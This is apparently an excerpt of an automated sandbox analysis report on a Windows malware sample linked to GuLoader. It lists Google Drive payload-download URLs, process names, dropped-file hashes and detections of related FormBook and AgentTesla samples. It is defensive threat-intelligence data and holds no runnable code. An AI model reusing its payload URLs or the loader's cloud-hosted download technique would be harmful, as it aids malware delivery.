                                                                                                                  http://www.ftp.ftp://ftp.gopher.Autocueing.exe, 00000008.00000001.2515081160.0000000000649000.00000020.00000001.01000000.00000008.sdmpfalse
                                                                                                                    high
                                                                                                                    https://drive.usercontent.google.com/Autocueing.exe, 00000008.00000003.3006734632.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://nsis.sf.net/NSIS_ErrorErrorav8XPPpdBc.exe, Autocueing.exe.2.drfalse
                                                                                                                        high
                                                                                                                        https://drive.google.com/HAutocueing.exe, 00000008.00000003.2852974758.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2806891781.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2971489970.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://ssl.gAutocueing.exe, 00000008.00000003.2899186565.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2910627021.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2922227503.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://drive.google.com/FAutocueing.exe, 00000008.00000003.3256468742.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.2516453019.0000000004CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvAutocueing.exe, 00000008.00000003.3279195163.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3267586031.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://drive.usercontent.google.com/servAutocueing.exe, 00000008.00000003.2995816614.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2982316924.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3018318612.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3006734632.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://drive.google.com/4C7797FE41F2A87CA6B2734C43Autocueing.exe, 00000008.00000003.2609864429.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2622041447.0000000003464000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2621619142.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2646384856.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2609988304.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2658888711.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2635189602.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://drive.google.com/mPqiekafjqjNlgzAtvpzw_A7pqv34Autocueing.exe, 00000008.00000003.3229828688.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3230193224.0000000003463000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://drive.google.com/ertificatesAutocueing.exe, 00000008.00000003.2780528849.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2708087359.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2830233002.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2778129056.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2876323516.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2754450948.0000000003462000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2754294780.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2765237850.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2818489505.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2731411699.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2852974758.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2719652725.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2806891781.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2864019301.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2791678279.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2765349755.0000000003462000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2841476240.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://drive.usercontent.google.com/DAutocueing.exe, 00000008.00000003.3312768786.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000002.3395765664.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3324327497.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3334442052.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3391633613.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3368992406.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3379961503.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3357241032.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.2516453019.0000000004CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_AAutocueing.exe, 00000008.00000003.3256468742.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3242307516.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3229828688.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3217749559.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3242196784.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3230193224.0000000003463000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdAutocueing.exe, 00000008.00000001.2515081160.00000000005F2000.00000020.00000001.01000000.00000008.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://drive.usercontent.google.com/-=Autocueing.exe, 00000008.00000003.3346088252.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3312768786.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3193568265.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3334442052.0000000003465000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2995816614.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2609864429.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3122962700.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3089505610.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3042334490.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2780528849.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2695356999.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3279195163.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000002.3395765664.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2708087359.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2830233002.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3147400004.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3256468742.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 
00000008.00000003.2933747254.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3324327497.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2778129056.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3302032884.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://drive.usercontent.google.com/downloaWdAutocueing.exe, 00000008.00000002.3395765664.0000000003432000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://drive.usercontent.google.com/download?id=1_vAutocueing.exe, 00000008.00000003.3089505610.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3042334490.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3100280584.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3076301554.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3053814050.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3112204517.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3029253824.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3065378024.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://drive.google.com/(Autocueing.exe, 00000008.00000003.3159034020.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3170311174.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://drive.usercontent.google.com/id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&eAutocueing.exe, 00000008.00000002.3395765664.0000000003432000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://drive.google.com/~XNAutocueing.exe, 00000008.00000003.3312768786.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3334442052.0000000003465000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3334572115.000000000349E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3279195163.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3256468742.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3324327497.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3302032884.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3312825589.000000000349E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3267586031.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3290522489.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://drive.usercontent.google.com/6Autocueing.exe, 00000008.00000003.2956303775.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2971489970.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://drive.usercontent.google.com/roject.netAutocueing.exe, 00000008.00000003.3346088252.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000002.3395765664.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3334442052.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3391633613.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3368992406.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3379961503.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3357241032.000000000345E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
IP | Domain | Country | ASN | ASN Name | Malicious
142.250.185.129 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
142.250.185.142 | drive.google.com | United States | 15169 | GOOGLEUS | false
                                                                                                                                                                Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                Analysis ID:1588780
                                                                                                                                                                Start date and time:2025-01-11 05:26:23 +01:00
                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                Overall analysis duration:0h 6m 31s
                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                Report type:full
                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                Number of analysed new started processes analysed:9
                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                Technologies:
                                                                                                                                                                • HCA enabled
                                                                                                                                                                • EGA enabled
                                                                                                                                                                • AMSI enabled
                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                Sample name:av8XPPpdBc.exe
                                                                                                                                                                renamed because original name is a hash value
                                                                                                                                                                Original Sample Name:a86c116c881fc184302b73c91a25e0bf0a8952971815891def98b50ff3c7e7d1.exe
                                                                                                                                                                Detection:MAL
                                                                                                                                                                Classification:mal100.troj.evad.winEXE@6/13@2/2
                                                                                                                                                                EGA Information:
                                                                                                                                                                • Successful, ratio: 33.3%
                                                                                                                                                                HCA Information:
                                                                                                                                                                • Successful, ratio: 92%
                                                                                                                                                                • Number of executed functions: 73
                                                                                                                                                                • Number of non-executed functions: 31
                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.109.210.53
                                                                                                                                                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                • Execution Graph export aborted for target powershell.exe, PID 5072 because it is empty
                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
23:27:16 | API Interceptor | 37x Sleep call for process: powershell.exe modified
23:28:01 | API Interceptor | 34x Sleep call for process: Autocueing.exe modified
                                                                                                                                                                No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
37f463bf4616ecd445d4a1937da06e19 | QNuQ5e175D.exe | malicious | GuLoader | 142.250.185.142, 142.250.185.129
 | 7uY105UTJU.exe | malicious | GuLoader | 142.250.185.142, 142.250.185.129
 | QNuQ5e175D.exe | malicious | GuLoader | 142.250.185.142, 142.250.185.129
 | iwEnYIOol8.exe | malicious | FormBook, GuLoader | 142.250.185.142, 142.250.185.129
 | Ntwph4urc1.exe | malicious | FormBook, GuLoader | 142.250.185.142, 142.250.185.129
 | 2976587-987347589.07.exe | malicious | Nitol, Xmrig | 142.250.185.142, 142.250.185.129
 | 2976587-987347589.08.exe | malicious | Nitol | 142.250.185.142, 142.250.185.129
 | Ntwph4urc1.exe | malicious | FormBook, GuLoader | 142.250.185.142, 142.250.185.129
 | 2976587-987347589.08.exe | malicious | Unknown | 142.250.185.142, 142.250.185.129
 | yMXFgPOdf2.exe | malicious | GuLoader | 142.250.185.142, 142.250.185.129
Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Users\user\AppData\Local\Temp\nswE27F.tmp\nsExec.dll | 7uY105UTJU.exe | malicious | GuLoader |
 | iwEnYIOol8.exe | malicious | FormBook, GuLoader |
 | 678763_PDF.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger |
 | file.exe | malicious | GuLoader, Snake Keylogger |
 | Shipping documents 000022999878999800009999.exe | malicious | AgentTesla, GuLoader |
 | Ze1Ueabtx5.img | malicious | AgentTesla, GuLoader |
 | Documenti di spedizione 0009333000459595995.exe | malicious | AgentTesla, GuLoader |
 | 4hIPvzV6a2.exe | malicious | Unknown |
 | SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exe | malicious | Unknown |
 | SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exe | malicious | Unknown |
                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:modified
                                                                                                                                                                                    Size (bytes):53158
                                                                                                                                                                                    Entropy (8bit):5.062687652912555
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                                                                                                                                                                                    MD5:5D430F1344CE89737902AEC47C61C930
                                                                                                                                                                                    SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                                                                                                                                                                                    SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                                                                                                                                                                                    SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):706493
                                                                                                                                                                                    Entropy (8bit):7.805950633156626
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12288:IfL/Ufibu6BWJWE2DeMQ3Tj1tYZl4Tzzo27tKlQyYefZKSxA340ryKhz:IfL8fibu6BWMDU427tjexKj3v
                                                                                                                                                                                    MD5:21F092B643089F4C05D3257430075A65
                                                                                                                                                                                    SHA1:E54525E972627916BAC452001CD2F5A5E75C650D
                                                                                                                                                                                    SHA-256:A86C116C881FC184302B73C91A25E0BF0A8952971815891DEF98B50FF3C7E7D1
                                                                                                                                                                                    SHA-512:C808A0F5D2393C98B37C0C60E99355714489C38A2126C461B10BFF1687D1747042237BEA26140C0A171CC916A750EE9681C4867E7D6D41B86C40FCD736025EC1
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 62%
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):26
                                                                                                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:high, very likely benign file
                                                                                                                                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:high, very likely benign file
                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                    Process:C:\Users\user\Desktop\av8XPPpdBc.exe
                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):7168
                                                                                                                                                                                    Entropy (8bit):5.2959870663251625
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:JwzdzBzMDhOZZDbXf5GsWvSv1ckne94SDbYkvML1HT1fUNQaSGYuH0DQ:JTQHDb2vSuOc41ZfUNQZGdHM
                                                                                                                                                                                    MD5:B4579BC396ACE8CAFD9E825FF63FE244
                                                                                                                                                                                    SHA1:32A87ED28A510E3B3C06A451D1F3D0BA9FAF8D9C
                                                                                                                                                                                    SHA-256:01E72332362345C415A7EDCB366D6A1B52BE9AC6E946FB9DA49785C140BA1A4B
                                                                                                                                                                                    SHA-512:3A76E0E259A0CA12275FED922CE6E01BDFD9E33BA85973E80101B8025EF9243F5E32461A113BBCC6AA75E40894BB5D3A42D6B21045517B6B3CF12D76B4CFA36A
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                                    • Filename: 7uY105UTJU.exe, Detection: malicious
                                                                                                                                                                                    • Filename: iwEnYIOol8.exe, Detection: malicious
                                                                                                                                                                                    • Filename: 678763_PDF.exe, Detection: malicious
                                                                                                                                                                                    • Filename: file.exe, Detection: malicious
                                                                                                                                                                                    • Filename: Shipping documents 000022999878999800009999.exe, Detection: malicious
                                                                                                                                                                                    • Filename: Ze1Ueabtx5.img, Detection: malicious
                                                                                                                                                                                    • Filename: Documenti di spedizione 0009333000459595995.exe, Detection: malicious
                                                                                                                                                                                    • Filename: 4hIPvzV6a2.exe, Detection: malicious
                                                                                                                                                                                    • Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exe, Detection: malicious
                                                                                                                                                                                    • Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exe, Detection: malicious
                                                                                                                                                                                    Process:C:\Users\user\Desktop\av8XPPpdBc.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (4199), with CRLF, LF line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):71111
                                                                                                                                                                                    Entropy (8bit):5.191239155448104
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:POS0+fOX1QPVwmhXek0nf+ov91o0ygqi/zckAz1Om/Dw:POS0Ms1QV4f+o9LZcnw
                                                                                                                                                                                    MD5:86CFEA49F8B2A1A68CC0EFE3C7F4662F
                                                                                                                                                                                    SHA1:1E4791D2195DE246665B17502311A125291BF90D
                                                                                                                                                                                    SHA-256:3E180565B0183374C01761CE59258A1C764DD325B10CB4803D04E00FAAAD2DB0
                                                                                                                                                                                    SHA-512:7C2009838BDD441B2660DA4D7AA356FAA823D1FE82806C876654C89DC3C451F17FF319F7684AC10E2A1904C5EC719138FB797AB2993E3511230A86C0EDC5DD65
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Process:C:\Users\user\Desktop\av8XPPpdBc.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):408232
                                                                                                                                                                                    Entropy (8bit):1.259531155482668
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:c3mYm00dVSgDT+afxNr3DwNJbiI7MrrtHFmYA3vCiuv/BQanrlhqkroqqL7jCzHs:X00FVwDotSeUpjvxXDpih4YZtc
                                                                                                                                                                                    MD5:CCE82C77E237537520FBD52B63A51E58
                                                                                                                                                                                    SHA1:D902CE813446431FFECA35141FCD9825D4DBEF4D
                                                                                                                                                                                    SHA-256:0F7DCA6879E497104B6813228391DECF7D6270D90FC887F1B9384B5E5B438221
                                                                                                                                                                                    SHA-512:2F0C0A6FBA09D19D72828589A658FEECD9E0A03F2B8C3DCA046AACFCB887375D538452D59DB24EDB8D17199AC3CA43ED1373262B6206B30F55F00ED159BAFEFE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Process:C:\Users\user\Desktop\av8XPPpdBc.exe
                                                                                                                                                                                    File Type:Matlab v4 mat-file (little endian) , numeric, rows 0, columns 55
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):379198
                                                                                                                                                                                    Entropy (8bit):1.2531245811733491
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:K2a+g7Qqek5bnEKRY3dJkKoYZrcvYy5oXBfwokPtW:TrvqLJnudnttcvARYtW
                                                                                                                                                                                    MD5:B4BD98AA231F431FA2C0B32C041971DA
                                                                                                                                                                                    SHA1:D58868B02A5DEDACC33CE7EB0658201EF5A29766
                                                                                                                                                                                    SHA-256:E34CA004CCB16A80E49010B584428A08AB3D89FCA778567346D26F84FF892962
                                                                                                                                                                                    SHA-512:69CD7AF495A1DC3F612B456A2ABB2FE9F6FF556E73DA0707B26325E08AA94138FB094DAA4A35E7C7BCDCE81FDF118A9A4C664632523CEED16765B2E74FCBDD05
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Process:C:\Users\user\Desktop\av8XPPpdBc.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):495136
                                                                                                                                                                                    Entropy (8bit):1.2514913232658866
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:jfLDH9Jx2uiEaWIwEfM+5EUPDohS/uF1bXyCOAqRu:TsIaV+CDTuF1bizAT
                                                                                                                                                                                    MD5:F28B6FB0CA8AF14D2913C43CBEA08754
                                                                                                                                                                                    SHA1:0BA129FCFA0131A4EFCDF2B1952F4FAE59604720
                                                                                                                                                                                    SHA-256:F1C35573809F92DC65D2EB2EBC3CD9D0C78E75E73ED741E52BAECAE2FC02DD70
                                                                                                                                                                                    SHA-512:523F6E0A8E879F13AB9D7BAE0E7A7E0157ABB0A8B1240F0EC0B5FF84C26A3F1519535DFAD9170BC6E887AE70DE03B939148D629695DB71DC53DF5A75AC2E2757
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Process:C:\Users\user\Desktop\av8XPPpdBc.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):301869
                                                                                                                                                                                    Entropy (8bit):7.694643941781828
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6144:iHXVPdSH6j0MBXnqMXt9pLZhs6T7xzQykNWvqU1C72Utl:MSH6jgMXt9pLZFT0WSU1C7xP
                                                                                                                                                                                    MD5:43775D590E4A73A56364CACF70BF6EFB
                                                                                                                                                                                    SHA1:64D823C615ABE114733D308A97F66DFAF71D2DF4
